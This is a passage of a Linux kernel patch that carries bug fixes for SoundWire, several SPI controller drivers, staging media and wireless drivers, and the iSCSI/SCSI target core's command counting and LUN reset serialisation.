+@@ -704,7 +704,7 @@ static int qcom_swrm_init(struct qcom_swrm_ctrl *ctrl)
+ 	}
+ 
+ 	/* Configure number of retries of a read/write cmd */
+-	if (ctrl->version > 0x01050001) {
++	if (ctrl->version >= 0x01050001) {
+ 		/* Only for versions >= 1.5.1 */
+ 		ctrl->reg_write(ctrl, SWRM_CMD_FIFO_CFG_ADDR,
+ 				SWRM_RD_WR_CMD_RETRIES |
+diff --git a/drivers/spi/atmel-quadspi.c b/drivers/spi/atmel-quadspi.c
+index 70637e46290a4..e8971ec74f82e 100644
+--- a/drivers/spi/atmel-quadspi.c
++++ b/drivers/spi/atmel-quadspi.c
+@@ -706,18 +706,28 @@ static int atmel_qspi_remove(struct platform_device *pdev)
+ 	struct atmel_qspi *aq = spi_controller_get_devdata(ctrl);
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&pdev->dev);
+-	if (ret < 0)
+-		return ret;
+-
+ 	spi_unregister_controller(ctrl);
+-	atmel_qspi_write(QSPI_CR_QSPIDIS, aq, QSPI_CR);
++
++	ret = pm_runtime_get_sync(&pdev->dev);
++	if (ret >= 0) {
++		atmel_qspi_write(QSPI_CR_QSPIDIS, aq, QSPI_CR);
++		clk_disable(aq->qspick);
++		clk_disable(aq->pclk);
++	} else {
++		/*
++		 * atmel_qspi_runtime_{suspend,resume} just disable and enable
++		 * the two clks respectively. So if resume failed, these are
++		 * off, and we skip hardware access and disabling these clks again.
++		 */
++		dev_warn(&pdev->dev, "Failed to resume device on remove\n");
++	}
++
++	clk_unprepare(aq->qspick);
++	clk_unprepare(aq->pclk);
+ 
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 
+-	clk_disable_unprepare(aq->qspick);
+-	clk_disable_unprepare(aq->pclk);
+ 	return 0;
+ }
+ 
+@@ -786,7 +796,11 @@ static int __maybe_unused atmel_qspi_runtime_resume(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	return clk_enable(aq->qspick);
++	ret = clk_enable(aq->qspick);
++	if (ret)
++		clk_disable(aq->pclk);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops __maybe_unused atmel_qspi_pm_ops = {
+diff --git a/drivers/spi/spi-cadence-quadspi.c b/drivers/spi/spi-cadence-quadspi.c
+index 676313e1bdad1..fa11610ab40b0 100644
+--- a/drivers/spi/spi-cadence-quadspi.c
++++ b/drivers/spi/spi-cadence-quadspi.c
+@@ -1768,32 +1768,36 @@ static int cqspi_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-#ifdef CONFIG_PM_SLEEP
+ static int cqspi_suspend(struct device *dev)
+ {
+ 	struct cqspi_st *cqspi = dev_get_drvdata(dev);
++	struct spi_master *master = dev_get_drvdata(dev);
++	int ret;
+ 
++	ret = spi_master_suspend(master);
+ 	cqspi_controller_enable(cqspi, 0);
+-	return 0;
++
++	clk_disable_unprepare(cqspi->clk);
++
++	return ret;
+ }
+ 
+ static int cqspi_resume(struct device *dev)
+ {
+ 	struct cqspi_st *cqspi = dev_get_drvdata(dev);
++	struct spi_master *master = dev_get_drvdata(dev);
+ 
+-	cqspi_controller_enable(cqspi, 1);
+-	return 0;
+-}
++	clk_prepare_enable(cqspi->clk);
++	cqspi_wait_idle(cqspi);
++	cqspi_controller_init(cqspi);
+ 
+-static const struct dev_pm_ops cqspi__dev_pm_ops = {
+-	.suspend = cqspi_suspend,
+-	.resume = cqspi_resume,
+-};
++	cqspi->current_cs = -1;
++	cqspi->sclk = 0;
++
++	return spi_master_resume(master);
++}
+ 
+-#define CQSPI_DEV_PM_OPS	(&cqspi__dev_pm_ops)
+-#else
+-#define CQSPI_DEV_PM_OPS	NULL
+-#endif
++static DEFINE_SIMPLE_DEV_PM_OPS(cqspi_dev_pm_ops, cqspi_suspend, cqspi_resume);
+ 
+ static const struct cqspi_driver_platdata cdns_qspi = {
+ 	.quirks = CQSPI_DISABLE_DAC_MODE,
+@@ -1860,7 +1864,7 @@ static struct platform_driver cqspi_platform_driver = {
+ 	.remove = cqspi_remove,
+ 	.driver = {
+ 		.name = CQSPI_NAME,
+-		.pm = CQSPI_DEV_PM_OPS,
++		.pm = &cqspi_dev_pm_ops,
+ 		.of_match_table = cqspi_dt_ids,
+ 	},
+ };
+diff --git a/drivers/spi/spi-fsl-spi.c b/drivers/spi/spi-fsl-spi.c
+index 93152144fd2ec..5602f052b2b50 100644
+--- a/drivers/spi/spi-fsl-spi.c
++++ b/drivers/spi/spi-fsl-spi.c
+@@ -181,8 +181,8 @@ static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 				struct spi_device *spi,
+ 				int bits_per_word)
+ {
+-	/* QE uses Little Endian for words > 8
+-	 * so transform all words > 8 into 8 bits
++	/* CPM/QE uses Little Endian for words > 8
++	 * so transform 16 and 32 bits words into 8 bits
+ 	 * Unfortnatly that doesn't work for LSB so
+ 	 * reject these for now */
+ 	/* Note: 32 bits word, LSB works iff
+@@ -190,9 +190,11 @@ static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 	if (spi->mode & SPI_LSB_FIRST &&
+ 	    bits_per_word > 8)
+ 		return -EINVAL;
+-	if (bits_per_word > 8)
++	if (bits_per_word <= 8)
++		return bits_per_word;
++	if (bits_per_word == 16 || bits_per_word == 32)
+ 		return 8; /* pretend its 8 bits */
+-	return bits_per_word;
++	return -EINVAL;
+ }
+ 
+ static int fsl_spi_setup_transfer(struct spi_device *spi,
+@@ -222,7 +224,7 @@ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 		bits_per_word = mspi_apply_cpu_mode_quirks(cs, spi,
+ 							   mpc8xxx_spi,
+ 							   bits_per_word);
+-	else if (mpc8xxx_spi->flags & SPI_QE)
++	else
+ 		bits_per_word = mspi_apply_qe_mode_quirks(cs, spi,
+ 							  bits_per_word);
+ 
+diff --git a/drivers/spi/spi-imx.c b/drivers/spi/spi-imx.c
+index e4ccd0c329d06..6c9c87cd14cae 100644
+--- a/drivers/spi/spi-imx.c
++++ b/drivers/spi/spi-imx.c
+@@ -1856,13 +1856,11 @@ static int spi_imx_remove(struct platform_device *pdev)
+ 
+ 	spi_unregister_controller(controller);
+ 
+-	ret = pm_runtime_resume_and_get(spi_imx->dev);
+-	if (ret < 0) {
+-		dev_err(spi_imx->dev, "failed to enable clock\n");
+-		return ret;
+-	}
+-
+-	writel(0, spi_imx->base + MXC_CSPICTRL);
++	ret = pm_runtime_get_sync(spi_imx->dev);
++	if (ret >= 0)
++		writel(0, spi_imx->base + MXC_CSPICTRL);
++	else
++		dev_warn(spi_imx->dev, "failed to enable clock, skip hw disable\n");
+ 
+ 	pm_runtime_dont_use_autosuspend(spi_imx->dev);
+ 	pm_runtime_put_sync(spi_imx->dev);
+diff --git a/drivers/spi/spi-pci1xxxx.c b/drivers/spi/spi-pci1xxxx.c
+index a31c3b612a430..13efbfeff92ce 100644
+--- a/drivers/spi/spi-pci1xxxx.c
++++ b/drivers/spi/spi-pci1xxxx.c
+@@ -58,7 +58,7 @@
+ #define VENDOR_ID_MCHP 0x1055
+ 
+ #define SPI_SUSPEND_CONFIG 0x101
+-#define SPI_RESUME_CONFIG 0x303
++#define SPI_RESUME_CONFIG 0x203
+ 
+ struct pci1xxxx_spi_internal {
+ 	u8 hw_inst;
+@@ -199,8 +199,9 @@ static int pci1xxxx_spi_transfer_one(struct spi_controller *spi_ctlr,
+ 			else
+ 				regval &= ~SPI_MST_CTL_MODE_SEL;
+ 
+-			regval |= ((clkdiv << 5) | SPI_FORCE_CE | (len << 8));
++			regval |= ((clkdiv << 5) | SPI_FORCE_CE);
+ 			regval &= ~SPI_MST_CTL_CMD_LEN_MASK;
++			regval |= (len << 8);
+ 			writel(regval, par->reg_base +
+ 			       SPI_MST_CTL_REG_OFFSET(p->hw_inst));
+ 			regval = readl(par->reg_base +
+diff --git a/drivers/spi/spi-qup.c b/drivers/spi/spi-qup.c
+index 678dc51ef0174..205e54f157b4a 100644
+--- a/drivers/spi/spi-qup.c
++++ b/drivers/spi/spi-qup.c
+@@ -1277,18 +1277,22 @@ static int spi_qup_remove(struct platform_device *pdev)
+ 	struct spi_qup *controller = spi_master_get_devdata(master);
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&pdev->dev);
+-	if (ret < 0)
+-		return ret;
++	ret = pm_runtime_get_sync(&pdev->dev);
+ 
+-	ret = spi_qup_set_state(controller, QUP_STATE_RESET);
+-	if (ret)
+-		return ret;
++	if (ret >= 0) {
++		ret = spi_qup_set_state(controller, QUP_STATE_RESET);
++		if (ret)
++			dev_warn(&pdev->dev, "failed to reset controller (%pe)\n",
++				 ERR_PTR(ret));
+ 
+-	spi_qup_release_dma(master);
++		clk_disable_unprepare(controller->cclk);
++		clk_disable_unprepare(controller->iclk);
++	} else {
++		dev_warn(&pdev->dev, "failed to resume, skip hw disable (%pe)\n",
++			 ERR_PTR(ret));
++	}
+ 
+-	clk_disable_unprepare(controller->cclk);
+-	clk_disable_unprepare(controller->iclk);
++	spi_qup_release_dma(master);
+ 
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+diff --git a/drivers/spi/spi-sn-f-ospi.c b/drivers/spi/spi-sn-f-ospi.c
+index 333b22dfd8dba..0aedade8908c4 100644
+--- a/drivers/spi/spi-sn-f-ospi.c
++++ b/drivers/spi/spi-sn-f-ospi.c
+@@ -561,7 +561,7 @@ static bool f_ospi_supports_op(struct spi_mem *mem,
+ 	if (!f_ospi_supports_op_width(mem, op))
+ 		return false;
+ 
+-	return true;
++	return spi_mem_default_supports_op(mem, op);
+ }
+ 
+ static int f_ospi_adjust_op_size(struct spi_mem *mem, struct spi_mem_op *op)
+diff --git a/drivers/spmi/spmi.c b/drivers/spmi/spmi.c
+index 55381592bb5a6..e73d3017863cb 100644
+--- a/drivers/spmi/spmi.c
++++ b/drivers/spmi/spmi.c
+@@ -350,7 +350,8 @@ static void spmi_drv_remove(struct device *dev)
+ 	const struct spmi_driver *sdrv = to_spmi_driver(dev->driver);
+ 
+ 	pm_runtime_get_sync(dev);
+-	sdrv->remove(to_spmi_device(dev));
++	if (sdrv->remove)
++		sdrv->remove(to_spmi_device(dev));
+ 	pm_runtime_put_noidle(dev);
+ 
+ 	pm_runtime_disable(dev);
+diff --git a/drivers/staging/iio/resolver/ad2s1210.c b/drivers/staging/iio/resolver/ad2s1210.c
+index e4cf42438487d..636c45b128438 100644
+--- a/drivers/staging/iio/resolver/ad2s1210.c
++++ b/drivers/staging/iio/resolver/ad2s1210.c
+@@ -101,7 +101,7 @@ struct ad2s1210_state {
+ static const int ad2s1210_mode_vals[4][2] = {
+ 	[MOD_POS] = { 0, 0 },
+ 	[MOD_VEL] = { 0, 1 },
+-	[MOD_CONFIG] = { 1, 0 },
++	[MOD_CONFIG] = { 1, 1 },
+ };
+ 
+ static inline void ad2s1210_set_mode(enum ad2s1210_mode mode,
+diff --git a/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c b/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
+index 0bf513c26b6b5..a5c5bebad3061 100644
+--- a/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
++++ b/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
+@@ -823,10 +823,10 @@ static int write_ts_to_decoder(struct av7110 *av7110, int type, const u8 *buf, s
+ 		av7110_ipack_flush(ipack);
+ 
+ 	if (buf[3] & ADAPT_FIELD) {
++		if (buf[4] > len - 1 - 4)
++			return 0;
+ 		len -= buf[4] + 1;
+ 		buf += buf[4] + 1;
+-		if (!len)
+-			return 0;
+ 	}
+ 
+ 	av7110_ipack_instant_repack(buf + 4, len - 4, ipack);
+diff --git a/drivers/staging/media/rkvdec/rkvdec.c b/drivers/staging/media/rkvdec/rkvdec.c
+index 7bab7586918c1..82806f198074a 100644
+--- a/drivers/staging/media/rkvdec/rkvdec.c
++++ b/drivers/staging/media/rkvdec/rkvdec.c
+@@ -1066,6 +1066,8 @@ static int rkvdec_remove(struct platform_device *pdev)
+ {
+ 	struct rkvdec_dev *rkvdec = platform_get_drvdata(pdev);
+ 
++	cancel_delayed_work_sync(&rkvdec->watchdog_work);
++
+ 	rkvdec_v4l2_cleanup(rkvdec);
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_dont_use_autosuspend(&pdev->dev);
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus.c b/drivers/staging/media/sunxi/cedrus/cedrus.c
+index a43d5ff667163..a50a4d0a8f715 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus.c
++++ b/drivers/staging/media/sunxi/cedrus/cedrus.c
+@@ -547,6 +547,7 @@ static int cedrus_remove(struct platform_device *pdev)
+ {
+ 	struct cedrus_dev *dev = platform_get_drvdata(pdev);
+ 
++	cancel_delayed_work_sync(&dev->watchdog_work);
+ 	if (media_devnode_is_registered(dev->mdev.devnode)) {
+ 		media_device_unregister(&dev->mdev);
+ 		v4l2_m2m_unregister_media_controller(dev->m2m_dev);
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+index f8fbe78ccad9f..699ee7754428c 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+@@ -716,6 +716,7 @@ static int _rtl92e_sta_up(struct net_device *dev, bool is_silent_reset)
+ 	else
+ 		netif_wake_queue(dev);
+ 
++	priv->bfirst_after_down = false;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/staging/rtl8723bs/core/rtw_mlme.c b/drivers/staging/rtl8723bs/core/rtw_mlme.c
+index c6fd6cf741ef6..091842d70d486 100644
+--- a/drivers/staging/rtl8723bs/core/rtw_mlme.c
++++ b/drivers/staging/rtl8723bs/core/rtw_mlme.c
+@@ -1549,7 +1549,7 @@ void _rtw_join_timeout_handler(struct timer_list *t)
+ 	if (adapter->bDriverStopped || adapter->bSurpriseRemoved)
+ 		return;
+ 
+-	spin_lock_irq(&pmlmepriv->lock);
++	spin_lock_bh(&pmlmepriv->lock);
+ 
+ 	if (rtw_to_roam(adapter) > 0) { /* join timeout caused by roaming */
+ 		while (1) {
+@@ -1577,7 +1577,7 @@ void _rtw_join_timeout_handler(struct timer_list *t)
+ 
+ 	}
+ 
+-	spin_unlock_irq(&pmlmepriv->lock);
++	spin_unlock_bh(&pmlmepriv->lock);
+ }
+ 
+ /*
+@@ -1590,11 +1590,11 @@ void rtw_scan_timeout_handler(struct timer_list *t)
+ 						  mlmepriv.scan_to_timer);
+ 	struct	mlme_priv *pmlmepriv = &adapter->mlmepriv;
+ 
+-	spin_lock_irq(&pmlmepriv->lock);
++	spin_lock_bh(&pmlmepriv->lock);
+ 
+ 	_clr_fwstate_(pmlmepriv, _FW_UNDER_SURVEY);
+ 
+-	spin_unlock_irq(&pmlmepriv->lock);
++	spin_unlock_bh(&pmlmepriv->lock);
+ 
+ 	rtw_indicate_scan_done(adapter, true);
+ }
+diff --git a/drivers/target/iscsi/iscsi_target.c b/drivers/target/iscsi/iscsi_target.c
+index baf4da7bb3b4e..3f7a9f7f5f4e3 100644
+--- a/drivers/target/iscsi/iscsi_target.c
++++ b/drivers/target/iscsi/iscsi_target.c
+@@ -1190,9 +1190,10 @@ int iscsit_setup_scsi_cmd(struct iscsit_conn *conn, struct iscsit_cmd *cmd,
+ 	 * Initialize struct se_cmd descriptor from target_core_mod infrastructure
+ 	 */
+ 	__target_init_cmd(&cmd->se_cmd, &iscsi_ops,
+-			 conn->sess->se_sess, be32_to_cpu(hdr->data_length),
+-			 cmd->data_direction, sam_task_attr,
+-			 cmd->sense_buffer + 2, scsilun_to_int(&hdr->lun));
++			  conn->sess->se_sess, be32_to_cpu(hdr->data_length),
++			  cmd->data_direction, sam_task_attr,
++			  cmd->sense_buffer + 2, scsilun_to_int(&hdr->lun),
++			  conn->cmd_cnt);
+ 
+ 	pr_debug("Got SCSI Command, ITT: 0x%08x, CmdSN: 0x%08x,"
+ 		" ExpXferLen: %u, Length: %u, CID: %hu\n", hdr->itt,
+@@ -2055,7 +2056,8 @@ iscsit_handle_task_mgt_cmd(struct iscsit_conn *conn, struct iscsit_cmd *cmd,
+ 	__target_init_cmd(&cmd->se_cmd, &iscsi_ops,
+ 			  conn->sess->se_sess, 0, DMA_NONE,
+ 			  TCM_SIMPLE_TAG, cmd->sense_buffer + 2,
+-			  scsilun_to_int(&hdr->lun));
++			  scsilun_to_int(&hdr->lun),
++			  conn->cmd_cnt);
+ 
+ 	target_get_sess_cmd(&cmd->se_cmd, true);
+ 
+@@ -4218,9 +4220,12 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 	list_for_each_entry_safe(cmd, cmd_tmp, &tmp_list, i_conn_node) {
+ 		struct se_cmd *se_cmd = &cmd->se_cmd;
+ 
+-		if (se_cmd->se_tfo != NULL) {
+-			spin_lock_irq(&se_cmd->t_state_lock);
+-			if (se_cmd->transport_state & CMD_T_ABORTED) {
++		if (!se_cmd->se_tfo)
++			continue;
++
++		spin_lock_irq(&se_cmd->t_state_lock);
++		if (se_cmd->transport_state & CMD_T_ABORTED) {
++			if (!(se_cmd->transport_state & CMD_T_TAS))
+ 				/*
+ 				 * LIO's abort path owns the cleanup for this,
+ 				 * so put it back on the list and let
+@@ -4228,11 +4233,10 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 				 */
+ 				list_move_tail(&cmd->i_conn_node,
+ 					       &conn->conn_cmd_list);
+-			} else {
+-				se_cmd->transport_state |= CMD_T_FABRIC_STOP;
+-			}
+-			spin_unlock_irq(&se_cmd->t_state_lock);
++		} else {
++			se_cmd->transport_state |= CMD_T_FABRIC_STOP;
+ 		}
++		spin_unlock_irq(&se_cmd->t_state_lock);
+ 	}
+ 	spin_unlock_bh(&conn->cmd_lock);
+ 
+@@ -4243,6 +4247,16 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 		iscsit_free_cmd(cmd, true);
+ 
+ 	}
++
++	/*
++	 * Wait on commands that were cleaned up via the aborted_task path.
++	 * LLDs that implement iscsit_wait_conn will already have waited for
++	 * commands.
++	 */
++	if (!conn->conn_transport->iscsit_wait_conn) {
++		target_stop_cmd_counter(conn->cmd_cnt);
++		target_wait_for_cmds(conn->cmd_cnt);
++	}
+ }
+ 
+ static void iscsit_stop_timers_for_cmds(
+diff --git a/drivers/target/iscsi/iscsi_target_login.c b/drivers/target/iscsi/iscsi_target_login.c
+index 27e448c2d066c..274bdd7845ca9 100644
+--- a/drivers/target/iscsi/iscsi_target_login.c
++++ b/drivers/target/iscsi/iscsi_target_login.c
+@@ -1147,8 +1147,14 @@ static struct iscsit_conn *iscsit_alloc_conn(struct iscsi_np *np)
+ 		goto free_conn_cpumask;
+ 	}
+ 
++	conn->cmd_cnt = target_alloc_cmd_counter();
++	if (!conn->cmd_cnt)
++		goto free_conn_allowed_cpumask;
++
+ 	return conn;
+ 
++free_conn_allowed_cpumask:
++	free_cpumask_var(conn->allowed_cpumask);
+ free_conn_cpumask:
+ 	free_cpumask_var(conn->conn_cpumask);
+ free_conn_ops:
+@@ -1162,6 +1168,7 @@ free_conn:
+ 
+ void iscsit_free_conn(struct iscsit_conn *conn)
+ {
++	target_free_cmd_counter(conn->cmd_cnt);
+ 	free_cpumask_var(conn->allowed_cpumask);
+ 	free_cpumask_var(conn->conn_cpumask);
+ 	kfree(conn->conn_ops);
+diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c
+index f6e58410ec3f9..aeb03136773d5 100644
+--- a/drivers/target/target_core_device.c
++++ b/drivers/target/target_core_device.c
+@@ -782,6 +782,7 @@ struct se_device *target_alloc_device(struct se_hba *hba, const char *name)
+ 	spin_lock_init(&dev->t10_alua.lba_map_lock);
+ 
+ 	INIT_WORK(&dev->delayed_cmd_work, target_do_delayed_work);
++	mutex_init(&dev->lun_reset_mutex);
+ 
+ 	dev->t10_wwn.t10_dev = dev;
+ 	/*
+diff --git a/drivers/target/target_core_internal.h b/drivers/target/target_core_internal.h
+index 38a6d08f75b34..85e35cf582e50 100644
+--- a/drivers/target/target_core_internal.h
++++ b/drivers/target/target_core_internal.h
+@@ -138,7 +138,6 @@ int	init_se_kmem_caches(void);
+ void	release_se_kmem_caches(void);
+ u32	scsi_get_new_index(scsi_index_t);
+ void	transport_subsystem_check_init(void);
+-void	transport_uninit_session(struct se_session *);
+ unsigned char *transport_dump_cmd_direction(struct se_cmd *);
+ void	transport_dump_dev_state(struct se_device *, char *, int *);
+ void	transport_dump_dev_info(struct se_device *, struct se_lun *,
+diff --git a/drivers/target/target_core_tmr.c b/drivers/target/target_core_tmr.c
+index 2b95b4550a637..4718db628222b 100644
+--- a/drivers/target/target_core_tmr.c
++++ b/drivers/target/target_core_tmr.c
+@@ -188,14 +188,23 @@ static void core_tmr_drain_tmr_list(
+ 	 * LUN_RESET tmr..
+ 	 */
+ 	spin_lock_irqsave(&dev->se_tmr_lock, flags);
+-	if (tmr)
+-		list_del_init(&tmr->tmr_list);
+ 	list_for_each_entry_safe(tmr_p, tmr_pp, &dev->dev_tmr_list, tmr_list) {
++		if (tmr_p == tmr)
++			continue;
++
+ 		cmd = tmr_p->task_cmd;
+ 		if (!cmd) {
+ 			pr_err("Unable to locate struct se_cmd for TMR\n");
+ 			continue;
+ 		}
++
++		/*
++		 * We only execute one LUN_RESET at a time so we can't wait
++		 * on them below.
++		 */
++		if (tmr_p->function == TMR_LUN_RESET)
++			continue;
++
+ 		/*
+ 		 * If this function was called with a valid pr_res_key
+ 		 * parameter (eg: for PROUT PREEMPT_AND_ABORT service action
+@@ -379,14 +388,25 @@ int core_tmr_lun_reset(
+ 				tmr_nacl->initiatorname);
+ 		}
+ 	}
++
++
++	/*
++	 * We only allow one reset or preempt and abort to execute at a time
++	 * to prevent one call from claiming all the cmds causing a second
++	 * call from returning while cmds it should have waited on are still
++	 * running.
++	 */
++	mutex_lock(&dev->lun_reset_mutex);
++
+ 	pr_debug("LUN_RESET: %s starting for [%s], tas: %d\n",
+ 		(preempt_and_abort_list) ? "Preempt" : "TMR",
+ 		dev->transport->name, tas);
+-
+ 	core_tmr_drain_tmr_list(dev, tmr, preempt_and_abort_list);
+ 	core_tmr_drain_state_list(dev, prout_cmd, tmr_sess, tas,
+ 				preempt_and_abort_list);
+ 
++	mutex_unlock(&dev->lun_reset_mutex);
++
+ 	/*
+ 	 * Clear any legacy SPC-2 reservation when called during
+ 	 * LOGICAL UNIT RESET
+diff --git a/drivers/target/target_core_tpg.c b/drivers/target/target_core_tpg.c
+index 736847c933e5c..8ebccdbd94f0e 100644
+--- a/drivers/target/target_core_tpg.c
++++ b/drivers/target/target_core_tpg.c
+@@ -328,7 +328,7 @@ static void target_shutdown_sessions(struct se_node_acl *acl)
+ restart:
+ 	spin_lock_irqsave(&acl->nacl_sess_lock, flags);
+ 	list_for_each_entry(sess, &acl->acl_sess_list, sess_acl_list) {
+-		if (atomic_read(&sess->stopped))
++		if (sess->cmd_cnt && atomic_read(&sess->cmd_cnt->stopped))
+ 			continue;
+ 
+ 		list_del_init(&sess->sess_acl_list);
+diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c
+index 5926316252eb9..86adff2a86edd 100644
+--- a/drivers/target/target_core_transport.c
++++ b/drivers/target/target_core_transport.c
+@@ -220,12 +220,52 @@ void transport_subsystem_check_init(void)
+ 	sub_api_initialized = 1;
+ }
+ 
+-static void target_release_sess_cmd_refcnt(struct percpu_ref *ref)
++static void target_release_cmd_refcnt(struct percpu_ref *ref)
+ {
+-	struct se_session *sess = container_of(ref, typeof(*sess), cmd_count);
++	struct target_cmd_counter *cmd_cnt  = container_of(ref,
++							   typeof(*cmd_cnt),
++							   refcnt);
++	wake_up(&cmd_cnt->refcnt_wq);
++}
++
++struct target_cmd_counter *target_alloc_cmd_counter(void)
++{
++	struct target_cmd_counter *cmd_cnt;
++	int rc;
++
++	cmd_cnt = kzalloc(sizeof(*cmd_cnt), GFP_KERNEL);
++	if (!cmd_cnt)
++		return NULL;
++
++	init_completion(&cmd_cnt->stop_done);
++	init_waitqueue_head(&cmd_cnt->refcnt_wq);
++	atomic_set(&cmd_cnt->stopped, 0);
+ 
+-	wake_up(&sess->cmd_count_wq);
++	rc = percpu_ref_init(&cmd_cnt->refcnt, target_release_cmd_refcnt, 0,
++			     GFP_KERNEL);
++	if (rc)
++		goto free_cmd_cnt;
++
++	return cmd_cnt;
++
++free_cmd_cnt:
++	kfree(cmd_cnt);
++	return NULL;
+ }
++EXPORT_SYMBOL_GPL(target_alloc_cmd_counter);
++
++void target_free_cmd_counter(struct target_cmd_counter *cmd_cnt)
++{
++	/*
++	 * Drivers like loop do not call target_stop_session during session
++	 * shutdown so we have to drop the ref taken at init time here.
++	 */
++	if (!atomic_read(&cmd_cnt->stopped))
++		percpu_ref_put(&cmd_cnt->refcnt);
++
++	percpu_ref_exit(&cmd_cnt->refcnt);
++}
++EXPORT_SYMBOL_GPL(target_free_cmd_counter);
+ 
+ /**
+  * transport_init_session - initialize a session object
+@@ -233,32 +273,14 @@ static void target_release_sess_cmd_refcnt(struct percpu_ref *ref)
+  *
+  * The caller must have zero-initialized @se_sess before calling this function.
+  */
+-int transport_init_session(struct se_session *se_sess)
++void transport_init_session(struct se_session *se_sess)
+ {
+ 	INIT_LIST_HEAD(&se_sess->sess_list);
+ 	INIT_LIST_HEAD(&se_sess->sess_acl_list);
+ 	spin_lock_init(&se_sess->sess_cmd_lock);
+-	init_waitqueue_head(&se_sess->cmd_count_wq);
+-	init_completion(&se_sess->stop_done);
+-	atomic_set(&se_sess->stopped, 0);
+-	return percpu_ref_init(&se_sess->cmd_count,
+-			       target_release_sess_cmd_refcnt, 0, GFP_KERNEL);
+ }
+ EXPORT_SYMBOL(transport_init_session);
+ 
+-void transport_uninit_session(struct se_session *se_sess)
+-{
+-	/*
+-	 * Drivers like iscsi and loop do not call target_stop_session
+-	 * during session shutdown so we have to drop the ref taken at init
+-	 * time here.
+-	 */
+-	if (!atomic_read(&se_sess->stopped))
+-		percpu_ref_put(&se_sess->cmd_count);
+-
+-	percpu_ref_exit(&se_sess->cmd_count);
+-}
+-
+ /**
+  * transport_alloc_session - allocate a session object and initialize it
+  * @sup_prot_ops: bitmask that defines which T10-PI modes are supported.
+@@ -266,7 +288,6 @@ void transport_uninit_session(struct se_session *se_sess)
+ struct se_session *transport_alloc_session(enum target_prot_op sup_prot_ops)
+ {
+ 	struct se_session *se_sess;
+-	int ret;
+ 
+ 	se_sess = kmem_cache_zalloc(se_sess_cache, GFP_KERNEL);
+ 	if (!se_sess) {
+@@ -274,11 +295,7 @@ struct se_session *transport_alloc_session(enum target_prot_op sup_prot_ops)
+ 				" se_sess_cache\n");
+ 		return ERR_PTR(-ENOMEM);
+ 	}
+-	ret = transport_init_session(se_sess);
+-	if (ret < 0) {
+-		kmem_cache_free(se_sess_cache, se_sess);
+-		return ERR_PTR(ret);
+-	}
++	transport_init_session(se_sess);
+ 	se_sess->sup_prot_ops = sup_prot_ops;
+ 
+ 	return se_sess;
+@@ -444,8 +461,13 @@ target_setup_session(struct se_portal_group *tpg,
+ 		     int (*callback)(struct se_portal_group *,
+ 				     struct se_session *, void *))
+ {
++	struct target_cmd_counter *cmd_cnt;
+ 	struct se_session *sess;
++	int rc;
+ 
++	cmd_cnt = target_alloc_cmd_counter();
++	if (!cmd_cnt)
++		return ERR_PTR(-ENOMEM);
+ 	/*
+ 	 * If the fabric driver is using percpu-ida based pre allocation
+ 	 * of I/O descriptor tags, go ahead and perform that setup now..
+@@ -455,29 +477,36 @@ target_setup_session(struct se_portal_group *tpg,
+ 	else
+ 		sess = transport_alloc_session(prot_op);
+ 
+-	if (IS_ERR(sess))
+-		return sess;
++	if (IS_ERR(sess)) {
++		rc = PTR_ERR(sess);
++		goto free_cnt;
++	}
++	sess->cmd_cnt = cmd_cnt;
+ 
+ 	sess->se_node_acl = core_tpg_check_initiator_node_acl(tpg,
+ 					(unsigned char *)initiatorname);
+ 	if (!sess->se_node_acl) {
+-		transport_free_session(sess);
+-		return ERR_PTR(-EACCES);
++		rc = -EACCES;
++		goto free_sess;
+ 	}
+ 	/*
+ 	 * Go ahead and perform any remaining fabric setup that is
+ 	 * required before transport_register_session().
+ 	 */
+ 	if (callback != NULL) {
+-		int rc = callback(tpg, sess, private);
+-		if (rc) {
+-			transport_free_session(sess);
+-			return ERR_PTR(rc);
+-		}
++		rc = callback(tpg, sess, private);
++		if (rc)
++			goto free_sess;
+ 	}
+ 
+ 	transport_register_session(tpg, sess->se_node_acl, sess, private);
+ 	return sess;
++
++free_sess:
++	transport_free_session(sess);
++free_cnt:
++	target_free_cmd_counter(cmd_cnt);
++	return ERR_PTR(rc);
+ }
+ EXPORT_SYMBOL(target_setup_session);
+ 
+@@ -602,7 +631,8 @@ void transport_free_session(struct se_session *se_sess)
+ 		sbitmap_queue_free(&se_sess->sess_tag_pool);
+ 		kvfree(se_sess->sess_cmd_map);
+ 	}
+-	transport_uninit_session(se_sess);
++	if (se_sess->cmd_cnt)
++		target_free_cmd_counter(se_sess->cmd_cnt);
+ 	kmem_cache_free(se_sess_cache, se_sess);
+ }
+ EXPORT_SYMBOL(transport_free_session);
+@@ -1412,14 +1442,12 @@ target_cmd_size_check(struct se_cmd *cmd, unsigned int size)
+  *
+  * Preserves the value of @cmd->tag.
+  */
+-void __target_init_cmd(
+-	struct se_cmd *cmd,
+-	const struct target_core_fabric_ops *tfo,
+-	struct se_session *se_sess,
+-	u32 data_length,
+-	int data_direction,
